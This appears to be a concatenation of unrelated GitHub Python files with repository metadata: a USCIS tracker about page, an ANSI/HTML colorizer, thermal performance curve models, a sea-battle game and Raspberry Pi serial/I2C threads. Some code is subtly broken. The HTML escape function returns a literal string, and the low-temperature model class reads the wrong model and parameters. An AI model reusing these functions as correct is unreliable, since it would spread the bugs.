print(*[cups.popleft() for i in range(len(cups))])
print(f'Wasted litters of water: {wasted_water}')
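# Worked example (hypothetical input, not part of the original solution):
#   cups line:    "1 2" -> deque([1, 2]);  bottles line: "3" -> [3]
# The 1-litre cup is filled from the 3-litre bottle (2 litres wasted), the bottles
# run out, so the program prints "Cups: 2" and a wasted total of 2.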
|
[
"76039296+codelocks7@users.noreply.github.com"
] |
76039296+codelocks7@users.noreply.github.com
|
407664d79d63688fa1904fc5d1148aa5d8d4d2ce
|
d1b6ca6d310d646b64385ed87fed71ccec1cb6e3
|
/about_page.py
|
d42e1a4def82ac173833b9d7e2fa07e51909c25b
|
[] |
no_license
|
skaushikk/USCIS-tracker
|
7053d5af295632c8c1fa4ca0579cbf56e33497a4
|
1f4219c311f1a99a682fca6789e7922747338d2a
|
refs/heads/main
| 2023-04-24T18:08:03.714906
| 2021-05-09T02:16:55
| 2021-05-09T02:16:55
| 361,353,468
| 1
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,714
|
py
|
import streamlit as st
def app():
st.title('USCIS Case Status Analyzer')
st.subheader('Check, Analyze and Predict USCIS Application Status')
# st.markdown("<h3 style='text-align: right; color: gray;'>-- Kaushik Sirvole</h3>", unsafe_allow_html=True)
with st.beta_expander("ABOUT", expanded=True):
# st.subheader('ABOUT')
        st.write('USCIS Case Status Tracker app is built to help people who have a pending '
                 'application with the United States Citizenship and Immigration Services (USCIS) '
                 'by educating them and by tracking and predicting their case with respect to other similar '
                 'applications. Similar applications are defined as those of the same kind, filed from the '
                 'same locations, and filed during similar times.')
        st.write('The current indefinite, uncertain timelines, driven by the political climate and COVID '
                 'protocols, have put unprecedented strain on USCIS servicing capabilities and, consequently, '
                 'extreme stress on applicants whose lives are on hold while they wait for adjudication.')
        st.write('Furthermore, this app provides a platform for broader, in-depth analysis and prediction.')
with st.beta_expander("DISCLAIMER", expanded=False):
st.write('The application does not store any user information at all. All the information provided is from '
'publicly available data.')
with st.beta_expander("KNOWLEDGEBASE", expanded=False):
st.write("The details on different types of forms, terminology can be found in the USCIS information pages"
"https://www.uscis.gov/tools/a-z-index")
# st.selectbox()
|
[
"skaushikk@gmail.com"
] |
skaushikk@gmail.com
|
dca0df86cf196077787b8351e77a52367efaf8ea
|
a0af94e54aaeaf0dfc373196c3bc7372926a7c7f
|
/colorize
|
aca3ecc24004252a087c462d6b1a71056603bbf5
|
[
"MIT"
] |
permissive
|
cheshirex/colorize
|
7170f3ff250009bc4ca40e7740498328b3bf1ab0
|
c95049c312a422023e48b8e1522c57b4c2913446
|
refs/heads/main
| 2023-01-07T05:58:04.019437
| 2020-11-04T10:27:57
| 2020-11-04T10:27:57
| 309,968,575
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 3,445
|
#!/usr/bin/env python
# Tool to colorize output based on regular expressions, designed to work both
# with ANSI escape sequences and with HTML color codes. Data to colorize is input
# on STDIN, and result is output on STDOUT
# Usage:
# colorize <ansi|html> <color config filename>
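# Example color config (illustrative only; not shipped with this script). Each
# non-comment line is "<color> <regular expression>":
#   red     ERROR|FATAL
#   yellow  WARN(ING)?
#   green   \bOK\b|PASS
# An input line matching one of the expressions is printed in that color.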
import sys
import re
html_escape_table = {
"&": "&",
'"': """,
"'": "'",
">": ">",
"<": "<"
}
def htmlEscape(text):
"""Produce entities within text."""
try:
result = '"".join(html_escape_table.get(c,c) for c in text)'
except SyntaxError:
print "HTML mode not supported prior to Python 2.4"
sys.exit(1)
return result
def printHtmlHeader():
print '''
<html>
<head>
<style text="text/css">
body {
font-family: Monaco,
"Bitstream Vera Sans Mono",
"Lucida Console",
Terminal,
monospace;
font-size: 14;
}
</style>
</head>
<body>
<pre>'''
def printHtmlFooter():
print '''
</pre>
</body>
</html>
'''
escape = '\033'
colors = {'black': {'ansi': {'begin': escape + '[0;30m', 'end': escape + '[0m'},
'html': {'begin': '<font color=\'black\'>', 'end': '</font>'}},
'red': {'ansi': {'begin': escape + '[0;31m', 'end': escape + '[0m'},
'html': {'begin': '<font color=\'red\'>', 'end': '</font>'}},
'green': {'ansi': {'begin': escape + '[0;32m', 'end': escape + '[0m'},
'html': {'begin': '<font color=\'green\'>', 'end': '</font>'}},
'yellow': {'ansi': {'begin': escape + '[0;33m', 'end': escape + '[0m'},
'html': {'begin': '<font color=\'#C9960C\'>', 'end': '</font>'}},
'blue': {'ansi': {'begin': escape + '[0;34m', 'end': escape + '[0m'},
'html': {'begin': '<font color=\'blue\'>', 'end': '</font>'}},
'purple': {'ansi': {'begin': escape + '[0;35m', 'end': escape + '[0m'},
'html': {'begin': '<font color=\'purple\'>', 'end': '</font>'}},
'cyan': {'ansi': {'begin': escape + '[0;36m', 'end': escape + '[0m'},
'html': {'begin': '<font color=\'cyan\'>', 'end': '</font>'}},
'white': {'ansi': {'begin': escape + '[0;37m', 'end': escape + '[0m'},
'html': {'begin': '<font color=\'white\'>', 'end': '</font>'}}}
if sys.argv[1] in ('html', 'ansi'):
format = sys.argv[1]
else:
sys.exit(-1)
rules = {}
# Read color regular expressions
configFile = open(sys.argv[2])
for line in configFile:
if line[0] == '#':
continue
# Read each line - first word is colour ID, rest of line is regular expression
color, regex = line.strip().split(None, 1)
rules[regex] = color
configFile.close()
if format == 'html':
printHtmlHeader()
for line in sys.stdin:
# Clean up Unicode characters
line = line.replace('\xe2\x80\x98', "'").replace('\xe2\x80\x99',"'")
for regex, color in rules.items():
if re.search(regex, line):
if format == 'html':
line = htmlEscape(line)
print colors[color][format]['begin'] + line.strip() + colors[color][format]['end']
break
else:
if format == 'html':
line = htmlEscape(line)
print line.strip()
if format == 'html':
printHtmlFooter()
|
[
"noreply@github.com"
] |
cheshirex.noreply@github.com
|
|
8e1418e4e26d871472531d0c334592b6736bee75
|
07f37b31c48ae80d32831fe6eb3f58b2e9f9a0f0
|
/tpcfit/models.py
|
872bf6829ff506949e0289d4396550c3a78be115
|
[] |
no_license
|
hjosullivan/CMEEProject
|
2dcf970f2be47b43c81b78ac9dc754ef96199663
|
ee3dc452d9d61734f41eff94e2f4d0d896ed0cbe
|
refs/heads/master
| 2022-08-26T12:49:52.615471
| 2019-08-29T14:31:41
| 2019-08-29T14:31:41
| 160,700,900
| 0
| 0
| null | 2022-08-23T17:33:45
| 2018-12-06T16:20:56
|
Python
|
UTF-8
|
Python
| false
| false
| 18,125
|
py
|
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
""" models.py contains all available mathematical models to be fitted to thermal performance curves.
NOTE: Currently only Sharpe-Schoolfield variants """
import numpy as np
from lmfit import minimize, Minimizer, Parameters
class ThermalModelsException(Exception):
""" General purpose exception generator for ThermalModels"""
def __init__(self, msg):
Exception.__init__(self)
self.msg = msg
def __str__(self):
return "{}".format(self.msg)
class ThermalModels(object):
""" Class containing thermal models for fitting """
# Set some useful class variables
    # Boltzmann's constant
k = 8.617 * 10 ** (-5)
# Reference temperature (20 degrees C)
Tref = 283.15
# Set some useful error messages
_err_novals = ("Please supply input data for model fitting.")
_err_nonparam = ("Supplied parameters must be an instance of lmfit.parameter.Parameter or tpcfit.starting_parameters.StartParams")
_err_temperror = ("Temperature vector must be of type numpy.ndarray.")
_err_traiterror = ("Trait vector must be of type numpy.ndarray.")
_err_zero_neg_vals = ("Zero or negative values not accepted. Please supply positive values only.")
def __init__(self, temps=None, traits=None, fit_pars=None):
if temps is not None:
self.temps = temps
if not isinstance(temps, np.ndarray):
raise ThermalModelsException(self._err_temperror)
if self.temps is None:
raise ThermalModelsException(self._err_novals)
elif np.min(self.temps) < 0:
            raise ThermalModelsException(self._err_zero_neg_vals)
if traits is not None:
self.traits = traits
if not isinstance(traits, np.ndarray):
raise ThermalModelsException(self._err_traiterror)
if self.traits is None:
raise ThermalModelsException(self._err_novals)
elif np.min(self.traits) < 0:
            raise ThermalModelsException(self._err_zero_neg_vals)
if fit_pars is not None:
self.fit_pars = fit_pars
if not isinstance(fit_pars, Parameters):
self.fit_pars = self.fit_pars.gauss_params
#raise ThermalModelsException(self._err_nonparam)
elif self.fit_pars is None:
raise ThermalModelsException(self._err_novals)
@classmethod
def set_Tref(cls, Tref_val):
""" Allow user to set their own reference temperature """
cls.Tref = Tref_val
class SharpeSchoolfieldFull(ThermalModels):
model_name = "sharpeschoolfull"
def __init__(self, temps, traits, fit_pars):
super().__init__(temps, traits, fit_pars)
self.ssf_model = self.fit_ssf(temps, traits, fit_pars)
if self.ssf_model is not None:
# Return fitted trait values
self.ssf_fits = self.ssf_fitted_vals(self.ssf_model)
# Return parameter estimates from the model
self.final_estimates = self.ssf_estimates(self.ssf_model)
# Return initial parameter values supplied to the model
self.initial_params = self.ssf_init_params(self.ssf_model)
# Return AIC score
self.AIC = self.ssf_aic(self.ssf_model)
def ssf_fcn2min(self, temps, traits, fit_pars):
""" Function to be minimized
Parameters
----------
temps: numpy array
Temperature array in Kelvin
traits: numpy array
Trait array
params: lmfit.parameter.Parameters
Dictionary of parameters to fit full schoolfield model
Returns
-------
ssf_fcn2min: callable
Fitting function to be called by the optimizer - producing an array of residuals (difference between model and data)
"""
# Set parameter values
B0 = self.fit_pars["B0"].value
E = self.fit_pars["E"].value
Eh = self.fit_pars["Eh"].value
El = self.fit_pars["El"].value
Th = self.fit_pars["Th"].value
Tl = self.fit_pars["Tl"].value
        # Eh must be greater than E
if E >= Eh:
return 1e10
        # Th must be greater than Tl
if Th < (Tl + 1):
Th = Tl + 1
# And Tl must be less than Th
if Tl > Th - 1:
Tl = Th - 1
model = np.log((B0 * np.exp(1)**((-E / self.k) * ((1 / self.temps) - (1 / self.Tref)))) / ((1 + (np.exp(1)**((El / self.k) * ((1 / Tl) - (1 / self.temps))))) + (np.exp(1)**((Eh / self.k) * ((1 / Th) - (1 / self.temps))))))
# Return residual array
return np.array(np.exp(model) - self.traits)
def ssf_fitted_vals(self, ssf_model):
""" Called by a fit model only: A function to estimate the trait value at a given temperature according
to the Sharpe-Schoolfield model
Parameters
----------
ssf_model: lmfit.MinimizerResult
Minimizer result of a successful fit
Returns
-------
ssf_fits: numpy array
Fitted trait values
"""
# Get best-fit model parameters
B0 = self.ssf_model.params["B0"].value
E = self.ssf_model.params["E"].value
Eh = self.ssf_model.params["Eh"].value
El = self.ssf_model.params["El"].value
Th = self.ssf_model.params["Th"].value
Tl = self.ssf_model.params["Tl"].value
# Define model
model = np.log((B0 * np.exp(1)**((-E / self.k) * ((1 / self.temps) - (1 / self.Tref)))) / ((1 + (np.exp(1)**((El / self.k) * ((1 / Tl) - (1 / self.temps))))) + (np.exp(1)**((Eh / self.k) * ((1 / Th) - (1 / self.temps))))))
# Get untransformed fitted values
self.ssf_fits = np.array(np.exp(model))
return self.ssf_fits
def fit_ssf(self, temps, traits, fit_pars):
""" Fitting function for schoolfield full model
Parameters
----------
fcn2min: callable
function to be minimized by the optimizer
params: Parameter object
Dictionary of parameters to fit full schoolfield model
temps: numpy array
Temperature array in Kelvin
traits: numpy array
Trait array
Returns
-------
ssf_model: lmfit.MinimizerResult
Model result object
"""
# Log trait values
self.traits = np.log(self.traits)
# Minimize model
try:
self.ssf_model = minimize(self.ssf_fcn2min, self.fit_pars, args=(self.temps, self.traits), xtol = 1e-12, ftol = 1e-12, maxfev = 100000)
except Exception:
return None
return self.ssf_model
def ssf_estimates(self, ssf_model):
""" Get parameter estimtes from the model
Parameters
----------
ssf_model : lmfit.MinimizerResult
A successful model result
Returns
-------
final_estimates: dict
Dictionary of final fitted parameters from the model
"""
self.final_estimates = self.ssf_model.params.valuesdict()
return self.final_estimates
def ssf_init_params(self, ssf_model):
""" Get parameter estimtes from the model
Parameters
----------
ssf_model : lmfit.MinimizerResult
A successful model result
Returns
-------
initial_params: dict
Dictionary of initial parameters supplied to the model
"""
self.initial_params = self.ssf_model.init_values
return self.initial_params
def ssf_aic(self,ssf_model):
""" Get model AIC score
Parameters
----------
ssf_model : lmfit.MinimizerResult
A successful model result
Returns
-------
AIC: int
AIC score from fitted model
"""
self.AIC = self.ssf_model.aic
return self.AIC
def __repr__(self):
pass
# readable representation of the object (for user)
def __str__(self):
pass
class SharpeSchoolfieldHigh(ThermalModels):
model_name = "sharpeschoolhigh"
def __init__(self, temps, traits, fit_pars):
super().__init__(temps, traits, fit_pars)
self.ssh_model = self.fit_ssh(temps, traits, fit_pars)
if self.ssh_model is not None:
# Return fitted trait values
self.ssh_fits = self.ssh_fitted_vals(self.ssh_model)
# Return parameter estimates from the model
self.final_estimates = self.ssh_estimates(self.ssh_model)
# Return initial parameter values supplied to the model
self.initial_params = self.ssh_init_params(self.ssh_model)
# Return AIC score
self.AIC = self.ssh_aic(self.ssh_model)
def ssh_fcn2min(self, temps, traits, fit_pars):
""" Function to be minimized
Parameters
----------
temps: numpy array
Temperature array in Kelvin
traits: numpy array
Trait array
params: lmfit.parameter.Parameters
Dictionary of parameters to fit full schoolfield model
Returns
-------
ssh_fcn2min: callable
Fitting function to be called by the optimizer - producing an array of residuals (difference between model and data)
"""
# Set parameter values
B0 = self.fit_pars["B0"].value
E = self.fit_pars["E"].value
Eh = self.fit_pars["Eh"].value
Th = self.fit_pars["Th"].value
        # Eh must be greater than E
if E >= Eh:
return 1e10
model = np.log((B0 * np.exp(1)**((-E / self.k) * ((1 / self.temps) - (1 / self.Tref)))) / (1 + (np.exp(1)**((Eh / self.k) * ((1 / Th) - (1 / self.temps))))))
# Return residual array
return np.array(np.exp(model) - self.traits)
    def ssh_fitted_vals(self, ssh_model):
        """ Called by a fit model only: a function to estimate the trait value at a given temperature.
        Parameters
        ----------
        ssh_model: lmfit.MinimizerResult
Minimizer result of a successful fit
Returns
-------
ssh_fits: numpy array
Fitted trait values
"""
# Get best-fit model parameters
B0 = self.ssh_model.params["B0"].value
E = self.ssh_model.params["E"].value
Eh = self.ssh_model.params["Eh"].value
Th = self.ssh_model.params["Th"].value
# Define model
model = np.log((B0 * np.exp(1)**((-E / self.k) * ((1 / self.temps) - (1 / self.Tref)))) / (1 + (np.exp(1)**((Eh / self.k) * ((1 / Th) - (1 / self.temps))))))
# Get untransformed fitted values
self.ssh_fits = np.array(np.exp(model))
return self.ssh_fits
def fit_ssh(self, temps, traits, fit_pars):
""" Fitting function for schoolfield full model
Parameters
----------
fcn2min: callable
function to be minimized by the optimizer
params: Parameter object
Dictionary of parameters to fit full schoolfield model
temps: numpy array
Temperature array in Kelvin
traits: numpy array
Trait array
Returns
-------
ssf_model: lmfit.MinimizerResult
Model result object
"""
# Log trait values
self.traits = np.log(self.traits)
# Minimize model
try:
self.ssh_model = minimize(self.ssh_fcn2min, self.fit_pars, args=(self.temps, self.traits), xtol = 1e-12, ftol = 1e-12, maxfev = 100000)
except Exception:
return None
return self.ssh_model
def ssh_estimates(self, ssh_model):
""" Get parameter estimtes from the model
Parameters
----------
ssh_model : lmfit.MinimizerResult
A successful model result
Returns
-------
final_estimates: dict
Dictionary of final fitted parameters from the model
"""
self.final_estimates = self.ssh_model.params.valuesdict()
return self.final_estimates
    def ssh_init_params(self, ssh_model):
        """ Get the initial parameter values supplied to the model
        Parameters
        ----------
        ssh_model : lmfit.MinimizerResult
A successful model result
Returns
-------
initial_params: dict
Dictionary of initial parameters supplied to the model
"""
self.initial_params = self.ssh_model.init_values
return self.initial_params
    def ssh_aic(self, ssh_model):
""" Get model AIC score
Parameters
----------
ssf_model : lmfit.MinimizerResult
A successful model result
Returns
-------
AIC: int
AIC score from fitted model
"""
self.AIC = self.ssh_model.aic
return self.AIC
def __repr__(self):
pass
# readable representation of the object (for user)
def __str__(self):
pass
class SharpeSchoolfieldlow(ThermalModels):
model_name = "sharpeschoollow"
def __init__(self, temps, traits, fit_pars):
super().__init__(temps, traits, fit_pars)
        self.ssl_model = self.fit_ssl(temps, traits, fit_pars)
if self.ssl_model is not None:
# Return fitted trait values
self.ssl_fits = self.ssl_fitted_vals(self.ssl_model)
# Return parameter estimates from the model
self.final_estimates = self.ssl_estimates(self.ssl_model)
# Return initial parameter values supplied to the model
self.initial_params = self.ssl_init_params(self.ssl_model)
# Return AIC score
            self.AIC = self.ssl_aic(self.ssl_model)
def ssl_fcn2min(self, temps, traits, fit_pars):
""" Function to be minimized
Parameters
----------
temps: numpy array
Temperature array in Kelvin
traits: numpy array
Trait array
params: lmfit.parameter.Parameters
Dictionary of parameters to fit full schoolfield model
Returns
-------
ssl_fcn2min: callable
Fitting function to be called by the optimizer - producing an array of residuals (difference between model and data)
"""
# Set parameter values
B0 = self.fit_pars["B0"].value
E = self.fit_pars["E"].value
El = self.fit_pars["Eh"].value
Tl = self.fit_pars["Th"].value
model = np.log((B0 * np.exp(1)**((-E / self.k) * ((1 / self.temps) - (1 / self.Tref)))) / (1 + (np.exp(1)**((El / self.k) * ((1 / Tl) - (1 / self.temps))))))
# Return residual array
return np.array(np.exp(model) - self.traits)
    def ssl_fitted_vals(self, ssl_model):
        """ Called by a fit model only: a function to estimate the trait value at a given temperature.
Parameters
----------
ssl_model: lmfit.MinimizerResult
Minimizer result of a successful fit
Returns
-------
ssl_fits: numpy array
Fitted trait values
"""
# Get best-fit model parameters
B0 = self.ssh_model.params["B0"].value
E = self.ssh_model.params["E"].value
El = self.ssh_model.params["Eh"].value
Tl = self.ssh_model.params["Th"].value
# Define model
model = np.log((B0 * np.exp(1)**((-E / self.k) * ((1 / self.temps) - (1 / self.Tref)))) / (1 + (np.exp(1)**((El / self.k) * ((1 / Tl) - (1 / self.temps))))))
# Get untransformed fitted values
        self.ssl_fits = np.array(np.exp(model))
        return self.ssl_fits
    def fit_ssl(self, temps, traits, fit_pars):
        """ Fitting function for the Schoolfield low-temperature model
Parameters
----------
fcn2min: callable
function to be minimized by the optimizer
params: Parameter object
Dictionary of parameters to fit full schoolfield model
temps: numpy array
Temperature array in Kelvin
traits: numpy array
Trait array
Returns
-------
ssl_model: lmfit.MinimizerResult
Model result object
"""
# Log trait values
self.traits = np.log(self.traits)
# Minimize model
try:
self.ssl_model = minimize(self.ssl_fcn2min, self.fit_pars, args=(self.temps, self.traits), xtol = 1e-12, ftol = 1e-12, maxfev = 100000)
except Exception:
return None
return self.ssl_model
    def ssl_estimates(self, ssl_model):
        """ Get parameter estimates from the model
Parameters
----------
ssh_model : lmfit.MinimizerResult
A successful model result
Returns
-------
final_estimates: dict
Dictionary of final fitted parameters from the model
"""
self.final_estimates = self.ssl_model.params.valuesdict()
return self.final_estimates
    def ssl_init_params(self, ssl_model):
        """ Get the initial parameter values supplied to the model
Parameters
----------
ssl_model : lmfit.MinimizerResult
A successful model result
Returns
-------
initial_params: dict
Dictionary of initial parameters supplied to the model
"""
self.initial_params = self.ssl_model.init_values
return self.initial_params
    def ssl_aic(self, ssl_model):
""" Get model AIC score
Parameters
----------
ssl_model : lmfit.MinimizerResult
A successful model result
Returns
-------
AIC: int
AIC score from fitted model
"""
self.AIC = self.ssl_model.aic
return self.AIC
def __repr__(self):
pass
# readable representation of the object (for user)
def __str__(self):
pass
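# Minimal usage sketch (illustrative values; parameter names assumed from the full
# model above — kept as comments so importing this module stays side-effect free):
#
#   import numpy as np
#   from lmfit import Parameters
#   temps = np.array([278.15, 283.15, 288.15, 293.15, 298.15])   # Kelvin
#   traits = np.array([0.4, 0.7, 1.1, 1.6, 1.2])                 # positive trait values
#   pars = Parameters()
#   for name, value in [("B0", 1.0), ("E", 0.6), ("Eh", 3.0), ("El", 0.3),
#                       ("Th", 300.0), ("Tl", 280.0)]:
#       pars.add(name, value=value)
#   fit = SharpeSchoolfieldFull(temps, traits, pars)
#   print(fit.AIC, fit.final_estimates)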
|
[
"noreply@github.com"
] |
hjosullivan.noreply@github.com
|
2fb3b208f8422d53eb69c09474b9e669b7f9db6b
|
b30def8f44060e373dba0de9facb62964224d285
|
/config.py
|
97dc08977f3cd997b513264801ccb5c7cf5c2f98
|
[] |
no_license
|
saakash309/Data-Processing-
|
1136e2612b7068d9fef695587070e2b98ebb7ff8
|
7857de4654c611689b422d8d6c88e61ba498a4c0
|
refs/heads/main
| 2023-09-04T20:30:49.225368
| 2021-11-23T06:04:45
| 2021-11-23T06:04:45
| 430,939,150
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,185
|
py
|
from configparser import ConfigParser
from pprint import pprint
#reading the config file
class Data():
'''
    Return the set of columns from a config file that will be displayed
Path = path of the configuration file
'''
def __init__(self,path) -> None:
self.path = path
def fields(self):
config = ConfigParser()
config.read(self.path)
#finding the fields that needs to be displayed
keys = []
        if 'Idnumber' not in config['Fields'] or config['Fields']['Idnumber'] == 'no':
keys.append('IDNUMBER')
#print(config.options('Fields'))
for key,value in config.items(config.sections()[0]):
if value == 'yes':
keys.append(str(key).upper().strip())
return keys
    def fpath(self):
        config = ConfigParser()
        config.read(self.path)
        # Scan every key in the last section for the data-file path.
        for key, value in config.items(config.sections()[-1]):
            if key == 'PathtoDataFile'.lower():
                return value
        return None
#print(Data('config.ini').fpath())
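# Example config.ini layout this class expects (hypothetical file, shown for
# illustration only):
#
#   [Fields]
#   Idnumber = no
#   Name = yes
#   Email = yes
#
#   [Path]
#   PathtoDataFile = ./data/records.csv
#
# fields() would then return ['IDNUMBER', 'NAME', 'EMAIL'] and fpath() the CSV path.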
|
[
"noreply@github.com"
] |
saakash309.noreply@github.com
|
9c49e6ca3bd2a42e53334ed4c4c2dee500c889b3
|
ee1db6398a73882e750c86257b43390c5ec2a654
|
/fpm/setup.py
|
84cf025ee77323c37d5387470fd713ac4504e1a1
|
[
"MIT"
] |
permissive
|
gscigala/packet-generation
|
c795131e202e59d16fc99eca61008b850df9c6c5
|
137b2853e57756a9ade1af2e95c8b2839f401121
|
refs/heads/master
| 2021-01-23T03:12:48.984559
| 2017-04-04T13:50:46
| 2017-04-04T13:50:46
| 86,057,836
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 3,869
|
py
|
"""A setuptools based setup module.
See:
https://packaging.python.org/en/latest/distributing.html
https://github.com/pypa/sampleproject
"""
# Always prefer setuptools over distutils
from setuptools import setup, find_packages
# To use a consistent encoding
from codecs import open
from os import path
here = path.abspath(path.dirname(__file__))
# Get the long description from the README file
with open(path.join(here, 'README.rst'), encoding='utf-8') as f:
long_description = f.read()
setup(
name='test_sample',
# Versions should comply with PEP440. For a discussion on single-sourcing
# the version across setup.py and the project code, see
# https://packaging.python.org/en/latest/single_source_version.html
version='1.0.0',
description='A GStreamer test video project',
long_description=long_description,
# The project's main homepage.
url='https://github.com/gscigala/packet-generation',
# Author details
author='Guillaume Scigala',
author_email='guillaume@scigala.fr',
# Choose your license
license='MIT',
# See https://pypi.python.org/pypi?%3Aaction=list_classifiers
classifiers=[
# How mature is this project? Common values are
# 3 - Alpha
# 4 - Beta
# 5 - Production/Stable
'Development Status :: 3 - Alpha',
# Indicate who your project is intended for
'Intended Audience :: Developers',
'Topic :: Software Development :: Build Tools',
# Pick your license as you wish (should match "license" above)
'License :: OSI Approved :: MIT License',
# Specify the Python versions you support here. In particular, ensure
# that you indicate whether you support Python 2, Python 3 or both.
'Programming Language :: Python :: 2',
'Programming Language :: Python :: 2.7'
],
# What does your project relate to?
keywords='sample setuptools development streaming',
# You can just specify the packages manually here if your project is
# simple. Or you can use find_packages().
packages=find_packages(exclude=['contrib', 'docs', 'tests']),
# Alternatively, if you want to distribute just a my_module.py, uncomment
# this:
# py_modules=["my_module"],
# List run-time dependencies here. These will be installed by pip when
# your project is installed. For an analysis of "install_requires" vs pip's
# requirements files see:
# https://packaging.python.org/en/latest/requirements.html
#install_requires=['peppercorn'],
# List additional groups of dependencies here (e.g. development
# dependencies). You can install these using the following syntax,
# for example:
# $ pip install -e .[dev,test]
extras_require={
#'dev': ['check-manifest'],
#'test': ['coverage'],
},
# If there are data files included in your packages that need to be
# installed, specify them here. If using Python 2.6 or less, then these
# have to be included in MANIFEST.in as well.
package_data={
'test_sample': [
'data/logging.conf'
],
},
# Although 'package_data' is the preferred approach, in some case you may
# need to place data files outside of your packages. See:
# http://docs.python.org/3.4/distutils/setupscript.html#installing-additional-files # noqa
# In this case, 'data_file' will be installed into '<sys.prefix>/my_data'
#data_files=[('my_data', ['data/data_file'])],
# To provide executable scripts, use entry points in preference to the
# "scripts" keyword. Entry points provide cross-platform support and allow
# pip to create the appropriate form of executable for the target platform.
entry_points={
'console_scripts': [
'testSample=test_sample.__main__:main',
],
},
)
|
[
"guillaume.scigala@smile.fr"
] |
guillaume.scigala@smile.fr
|
65c81b2c37dfa24b81ae8c97d1e1d2f37c8af03a
|
b926393a43850799f57b59202796d128c5b611ab
|
/main.py
|
162002374fe6c83445e2d99937a3a90f3ac936c1
|
[] |
no_license
|
apustovitin/sea-battle
|
0435e697b2143e80fdd04cbabbd5a51f18536c0c
|
2546d9f296a7bd3a8e84af3bd0439b21180d27f6
|
refs/heads/master
| 2023-01-18T18:03:27.210594
| 2020-12-01T14:09:33
| 2020-12-01T14:09:33
| 317,479,808
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,482
|
py
|
import curses
import board_image
from game import Game
import random
def moves_loop(game):
if random.choice([False, True]):
is_break, is_restart = game.computer_move()
if is_break or is_restart:
return is_break, is_restart
while True:
is_break, is_restart = game.player_move()
if is_break or is_restart:
return is_break, is_restart
is_break, is_restart = game.computer_move()
if is_break or is_restart:
return is_break, is_restart
def game_loop(stdscr):
unknown_ships = [1, 1, 1, 1, 2, 2, 2, 3, 3, 4]
while True:
stdscr.clear()
computer_board = board_image.BoardImage()
player_board = board_image.BoardImage()
player_board_image = board_image.BoardImage()
game = Game(stdscr, ".\screen_layout.txt", unknown_ships, computer_board, player_board, player_board_image)
game.place_computer_ships()
game.print_screen_layout()
is_break, is_restart = game.place_player_ships()
if is_break:
break
if is_restart:
continue
is_break, is_restart = moves_loop(game)
if is_break:
break
if is_restart:
continue
def main():
stdscr = curses.initscr()
stdscr.clear()
curses.noecho()
curses.cbreak()
curses.curs_set(0)
stdscr.keypad(True)
game_loop(stdscr)
curses.endwin()
if __name__ == '__main__':
main()
|
[
"apustovitin@gmail.com"
] |
apustovitin@gmail.com
|
fa4752f737897f35e16ed0b252a1230746f6ee6d
|
7ff3ec2f2a6e093a63f09a30ec985c3564c79159
|
/Demo_2/Raspberry_Pi/Threading/Pi_Comms_Multi_Threading.py
|
7b0e7ee2d2290889fa410ff3a3ec584c98dfcb2e
|
[] |
no_license
|
lkseattle/SEED_FALL_2020_T3-1
|
468dafe4193a6663d5dc6fa09ea7cfc9953f4455
|
b7e026fee1d6f77f62fd84547beebac3b76c2532
|
refs/heads/master
| 2023-01-10T21:47:24.578863
| 2020-11-10T09:34:58
| 2020-11-10T09:34:58
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 6,016
|
py
|
#Cameron Kramr
#10/09/2020
#EENG 350
#Section A
#Computer Vision
#NOTE, this module requires pygame to be installed in order to run
#The code in this file deals with communicating with other devices outside of the raspberry pi.
import multiprocessing as mp
import termios
import os
import sys
from enum import Enum
from enum import IntEnum
import time
import serial
import board
import busio
import adafruit_character_lcd.character_lcd_rgb_i2c as character_lcd
from smbus2 import SMBus
import math
import ctypes
#import spidev
#Create the valid commands for controlling thread operation
class I2C_CMD(IntEnum):
LCD_CLR_MSG = 1
WRITE_ARDU = 2
FETCH_ANGLE = 3
class ARDU_CMD(IntEnum):
TARGET = 250
SEND = 1
RECEIVE = 2
#Main Serial handler thread deals with Serial nonsense.
def Serial_Handler(input_pipe, file = '/dev/ttyACM0', baud = 250000):
#Initialize Serial object
ser = serial.Serial(file, baud)
FPS = 100
data2 = ""
Start = time.time()
#time.sleep(2) #might need it so 'ser' can work properly
#Initialize variables
data = [0,0,0]
while (True):
#Data shape:
#[command, [magnitude, angle]]
#Non-blocking read of pipe waiting for input
try:
if(input_pipe.poll()):
data = input_pipe.recv()
while(ser.inWaiting()>0):
data2 += ser.readline().decode('utf-8')
#print("Arduino Data:")
#print(data2)
except:
print("Serial Error")
#print("Looping")
        if(data[0] == ARDU_CMD.SEND): #Send the queued string to the Arduino over serial
try:
#ser.write((' '.join([str(item) for item in data[1]]
for i in data[1]:
if(i != '\n'):
ser.write(i.encode())
#print(i)
#print("Sent Ardu:" + str(data[1]))
#pass
except:
print("Something's wrong with sending Serial Data!")
if(data2 != ""): #if we need to get the position from arduino, this if statement
#will do it. Feel free to alter "get_position" to whatever you want.
try:
#data2 = ser.readline().decode('utf-8').rstrip() #gets data from arduino
input_pipe.send(data2)
data2 = ""
pass
except:
print("Something's wrong with getting Serial Data!")
#Clear data
data[0] = 0
#Frame lock arduino
while(time.time() - Start < 1/FPS):
pass
#Main I2C handler thread deals with I2C nonsense.
def I2C_Handler(input_pipe, size, address, color = [255, 0, 0]):
#Initialize I2C objects
i2c_bus = busio.I2C(board.SCL, board.SDA)
lcd = character_lcd.Character_LCD_RGB_I2C(i2c_bus, size[1], size[0])
lcd.clear()
#Initialize SMbus object
sm_bus = SMBus(1)
#Initialize variables
I2C_FPS = 100 #Frame rate control for thread to conserve resources
I2C_Start = 0
data = [0,0]
data_in = ctypes.c_int8
#Initialize LCD screen
lcd.clear()
lcd.color = color
lcd.message = "Init LCD Handler Done ;)"
while(True):
#Record time
I2C_Start = time.time()
#Data shape:
#[cmd, content]
#Non-blocking read of pipe waiting for input
if(input_pipe.poll()):
data = input_pipe.recv()
#Switch on command portion of data to figure out what to do
if(data[0] == I2C_CMD.LCD_CLR_MSG): #Clear LCD and send it a string to display
try:
#time.sleep(0.1)
lcd.clear()
lcd.message = str(data[1])
pass
except:
print("SM Bus Error!")
elif(data[0] == I2C_CMD.WRITE_ARDU): #Write to the arduino #not needed anymore?
try:
print(data[1])
sm_bus.write_byte_data(address, 0, int(data[1]))
except:
print("SM Bus Error!")
sm_bus = SMBus(1)
